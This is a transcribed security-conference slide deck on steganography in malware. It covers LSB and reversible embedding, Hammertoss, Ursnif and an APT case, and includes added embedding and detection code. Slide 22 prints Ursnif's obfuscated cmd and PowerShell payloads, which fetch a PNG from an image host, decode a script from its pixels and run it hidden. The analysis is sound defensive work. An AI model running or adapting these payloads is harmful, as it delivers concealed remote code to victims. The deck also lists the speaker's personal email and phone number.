Analysis Steganography in Malware (K-Hackers)
Speaker: Seunghyung, Lee (Mail: lsh970804@gmail.com / H.P: 010-4529-9351)
Slide 1. Analysis Steganography in Malware. Speaker: Seunghyung, Lee
Slide 2. Table of Contents: Chapter 1. What is Steganography? / Chapter 2. About Accident (News) / Chapter 3. Malware Analysis / Summary / Q & A
Slide 3. Chapter 1, Section 1. What is Steganography? Data hiding covers four branches: Steganography, Covert Channels, Copyright Marking, Anonymity.
Slide 4. Chapter 1, Section 2. Steganography: Origin of the Word. Steganography = Stegano (hidden, covered) + Graphos (to write, to draw) = hidden writing, a secret message. Diagram: Sender combines cover image + secret data into a stego image; Receiver separates the stego image back into cover image + secret data.
Slide 5. Chapter 1, Section 3. Irreversible Data Hiding in Steganography: LSB (Least Significant Bit), PVD (Pixel-Value Differencing)
Slide 6. Chapter 1, Section 4. Reversible Data Hiding in Steganography (figure: LSB embedding example)
Gray image: 1 pixel = 8 bits [value: 0 ~ 255], bit positions 7 6 5 4 3 2 1 0.
Cover image pixels p1, p2, ...: p1 = 0 1 0 1 0 1 1 0, p2 = 0 1 0 1 1 1 0 0
Secret data: 1101 ...
Embedding algorithm -> stego pixels p1', p2', ...: p1' = 0 1 0 1 0 1 1 1, p2' = 0 1 0 1 1 1 0 1 (the least significant bit of each pixel is replaced by one secret bit)
Extracting algorithm -> secret data 1101 ...
Slide 7. Chapter 1, Section 3. Irreversible Data Hiding in Steganography: LSB (Least Significant Bit), PVD (Pixel-Value Differencing)
Slide 8. Chapter 1, Section 4. Reversible Data Hiding in Steganography: HS (Histogram Shifting), DE (Difference Expansion)
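The contrast the two sections draw, as an added example that is not part of the deck: the LSB embedding from the slide-6 figure beside Difference Expansion (Tian's DE, one of the reversible schemes named on slide 8) on the same pixel pair. Function names and the 8-bit gray pixel values are this example's own assumptions.

```python
# Added example, not from the deck: the LSB figure of slide 6 next to
# Difference Expansion (Tian's DE, slide 8) on the same pixel pair, to show
# why the deck files LSB under "irreversible" and DE under "reversible".
# Pixels are 8-bit gray values (0..255) as in the figure.

def lsb_embed(cover, bits):
    """Overwrite the least significant bit of each pixel with one secret bit."""
    return [(p & 0xFE) | b for p, b in zip(cover, bits)]

def lsb_extract(stego, n):
    """Read the secret back; the cover's own LSBs are lost for good."""
    return [p & 1 for p in stego[:n]]

def de_embed(x, y, b):
    """Expand the pair difference h = x - y to 2h + b, keeping the pair
    average; returns None when the new pair would leave 0..255 (such
    pairs must be skipped, which is why DE also needs a location map)."""
    avg = (x + y) // 2
    h = 2 * (x - y) + b
    x2, y2 = avg + (h + 1) // 2, avg - h // 2
    if not (0 <= x2 <= 255 and 0 <= y2 <= 255):
        return None
    return x2, y2

def de_extract(x2, y2):
    """Recover both the secret bit and the exact original pair."""
    h2 = x2 - y2
    b, h = h2 & 1, h2 >> 1          # floor halving keeps negatives right
    avg = (x2 + y2) // 2            # unchanged by the expansion
    return b, (avg + (h + 1) // 2, avg - h // 2)

def demo():
    cover = [0b01010110, 0b01011100]   # p1, p2 from the slide-6 figure
    secret = [1, 1]                    # first two bits of "1101"
    stego = lsb_embed(cover, secret)   # [0b01010111, 0b01011101]
    # Irreversible: the bits come back, the cover cannot be rebuilt from stego.
    lsb_bits_ok = lsb_extract(stego, 2) == secret
    # Reversible: DE returns the bit and the untouched cover pair.
    x2, y2 = de_embed(cover[0], cover[1], 1)
    bit, pair = de_extract(x2, y2)
    return stego, (x2, y2), lsb_bits_ok, bit == 1 and pair == tuple(cover)

if __name__ == "__main__":
    print(demo())
```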
Slide 9. Chapter 1, Section 5. File in the Image?
Slide 10. Chapter 2, Section 1. Steganography: About Accident
Slide 11. Chapter 2, Section 2. Hammertoss
Slide 12. Chapter 2, Section 2. Ursnif
Slide 13. Chapter 3, Section 1. North Korean Venus 121 APT organization, steganographic techniques
Slide 14. Chapter 3, Section 1. North Korean Venus 121 APT organization, steganographic techniques
Slide 15. Chapter 3, Section 1. North Korean Venus 121 APT organization, steganographic techniques
Slide 16. Chapter 3, Section 1. North Korean Venus 121 APT organization, steganographic techniques (on-slide text: JPGE 3H08)
Slide 17. Chapter 3, Section 1. North Korean Venus 121 APT organization, steganographic techniques
Slide 18. Chapter 3, Section 1. North Korean Venus 121 APT organization, steganographic techniques
Slide 19. Chapter 3, Section 2. Aznif, a malware that steals financial information
Slide 20. Chapter 3, Section 2. Aznif, a malware that steals financial information
Slide 21. Chapter 3, Section 2. Aznif, a malware that steals financial information
Slide 22. Chapter 3, Section 2. Aznif, a malware that steals financial information

First CMD Payload:
cmd.exe /V:ON/C"set lW=o.crm`VPx57^^l(SEX]L8{- Y=GZU:K%0B[9ia2eb*yftp_/T$j1'vdMF^|CHwk^&)WAIDn+}h4,sg6;3 R""ON&&for %9 in (15,2,70,82,45,78,78,47, // omitted //,13,78,62,84)do set Rc=!Rc!!lW:~%9,1!&&if %9 geq 84 cmd /C!Rc:~-1334!"

Second CMD Payload:
cmd /CEchO/ $4G7=[tYPE]('MATh') ; $48X7= [type]('SystEm.TExT'+'.ENcoDIng'); .("{1}{0}" -f'lsa') ('a') ("{0}{2}{1}" -f'Newct','-Obje');^^^&("{0}{1}"-f 'Add-Type') -AssemblyName "System.Drawing";${g}=^^^&('a') ("{4}{2}{1}{0}{3}"-f '.BiingwtmapSystem.Dra')((^^^&('a') ("{0}{1}{3}{2}" -f 'Net.','WetbClien')).("{1}{0}" -f'penReadO').Invoke("https://images2.imgbox.com/ca/88/A2ZSlW6S_o.png"));${O}=^^^&('a') ("{0}{1}"-f'Byte','[]') 1860;(0..2)^^^|.('%'){foreach(${x} in(0..619)){${p}=${g}.("{0}{1}" -f 'GetPixel').Invoke(${x},${_});${o}[${_}*620+${X}]=( $4g7::("{1}{0}"-f 'loorF').Invoke((${p}."B"-band15)*16)-bor(${p}."g" -band 15))}};^^^&("{0}{1}" -f'IEX')( ( LS vARIabLE:48x7 ).ValUE::"ascii"."getsTrInG"(${O}[0..1341])) |c:\wIndOwsSyStem32\CliP.ExE &&CMd.Exe /c powerSHELL -ExeCUTIONpOl BYPass -NoniN -wIndOwSTY HIDDEn -nOpROFi -st -NolOgO . ( "{0}{1}{2}" -f 'Add',( "{0}{1}" -f'-','Typ' ),'e' ) -Assem ("{3}{1}{5}{0}{4}{2}" -f ( "{2}{1}{0}" -f'd','.Winem' ),'yssS',( "{2}{1}{0}"-f 'Form','.','ows'),'t') ; ^^^& ( ${eNV`:cOMspec}[4,15,25]-jOIN'') ( ( [SYSteM.WiNDoWs.ForMS.CLIPbOaRd]::("{0}{1}" -f 'G',("{0}{1}" -f'ettExT' ))."iNvoKE"( ) ) ) ; [System.Windows.Forms.Clipboard]::("{0}{1}" -f'Clear' )."iNvOkE"( )

Third CMD Payload:
CMd.Exe /c powerSHELL -ExeCUTIONpOl BYPass -NoniN -wIndOwSTY HIDDEn -nOpROFi -st -NolOgO . ( "{0}{1}{2}" -f 'Add',( "{0}{1}" -f'-','Typ' ),'e' ) -Assem ("{3}{1}{5}{0}{4}{2}" -f ( "{2}{1}{0}" -f'd','.Winem' ),'yssS',( "{2}{1}{0}"-f 'Form','.','ows'),'t') ; ^& ( ${e`NV`:cOMs`pec}[4,15,25]-jOIN'') ( ( [SYSteM.WiNDoWs.ForMS.CLIPbOaRd]::("{0}{1}" -f 'G',("{0}{1}" -f'ettExT' ))."i`Nv`oKE"( ) ) ) ; [System.Windows.Forms.Clipboard]::("{0}{1}" -f'Clear' )."i`NvO`kE"( )
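The image decoding that the second payload performs, as an added example that is not from the deck or the malware sample: it walks 620 x 3 pixels, builds one byte per pixel from the low nibble of B (high half) and the low nibble of G (low half), and the payload then executes the first 1342 decoded bytes as ASCII. The example adds a simple check a defender can run on an image's pixels to spot this encoding; the pixel data, function names and the placeholder script are constructed for the example.

```python
# Added example, not from the deck or the Ursnif sample: the pixel-to-byte
# decoding of the second CMD payload plus a defender-side check for images
# carrying text this way. The "image" is a constructed pixel list.
import random
import string

WIDTH, ROWS = 620, 3          # the payload walks x in 0..619 over rows 0..2
SCRIPT_LEN = 1342             # it executes bytes 0..1341 of the 1860 decoded

def decode_nibbles(pixels, width=WIDTH, rows=ROWS):
    """pixels: dict (x, y) -> (R, G, B). Byte = low nibble of B as the high
    half, low nibble of G as the low half: (B -band 15)*16 -bor (G -band 15)."""
    out = bytearray(width * rows)
    for y in range(rows):
        for x in range(width):
            _r, g, b = pixels[(x, y)]
            out[y * width + x] = ((b & 15) << 4) | (g & 15)
    return bytes(out)

def printable_ratio(data):
    printable = set(string.printable.encode())
    return sum(c in printable for c in data) / max(len(data), 1)

def looks_like_hidden_text(data, threshold=0.9):
    """Low nibbles of a photo are near-uniform, so only ~39% of decoded bytes
    land in printable ASCII by chance; a script hidden this way is ~100%."""
    return printable_ratio(data) >= threshold

def constructed_pixels(payload, width=WIDTH, rows=ROWS, seed=1):
    """Test fixture: pseudo-random pixels with payload bytes in the low
    nibbles of B and G (constructed, not the real imgbox PNG)."""
    rnd = random.Random(seed)
    px = {}
    for i in range(width * rows):
        r, g, b = (rnd.randrange(256) for _ in range(3))
        if i < len(payload):
            b = (b & 0xF0) | (payload[i] >> 4)
            g = (g & 0xF0) | (payload[i] & 15)
        px[(i % width, i // width)] = (r, g, b)
    return px

# Constructed benign placeholder standing in for the hidden script text.
SAMPLE = (b"# constructed placeholder script line\n" * 40)[:SCRIPT_LEN]

def demo():
    carrier = decode_nibbles(constructed_pixels(SAMPLE))[:SCRIPT_LEN]
    clean = decode_nibbles(constructed_pixels(b""))
    return looks_like_hidden_text(carrier), looks_like_hidden_text(clean)
```

Running `demo()` returns `(True, False)`: the carrier image is flagged, the noise-only image is not.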
Slide 23. Chapter 3, Section 2. Aznif, a malware that steals financial information
Slide 24. Chapter 3, Section 2. Aznif, a malware that steals financial information
Slide 25. Chapter 3, Section 2. Aznif, a malware that steals financial information
Slide 26. Chapter 3, Section 2. Aznif, a malware that steals financial information
Slide 27. Chapter 3, Section 2. Aznif, a malware that steals financial information. Capabilities: 1. Web Browser Injection 2. MITB Attack 3. ScreenCapture & Video Grabbing 4. Hidden VNC & Socks Proxy Attack
Slide 28. Summary
● Steganography is a technique for embedding data inside other data.
● To evade detection, malware authors are actively using steganography techniques.
● Attacks that use steganography are very hard to detect with malware detection tools or defensive software.
● Dell SecureWorks: "The only way to prevent steganography is to update software regularly."
⇒ Research is needed that counters steganography through mathematical and statistical approaches rather than conventional anti-malware style solutions.
Slide 29. Q & A. Speaker: Seunghyung, Lee. Mail: lsh970804@gmail.com / H.P: 010-4529-9351

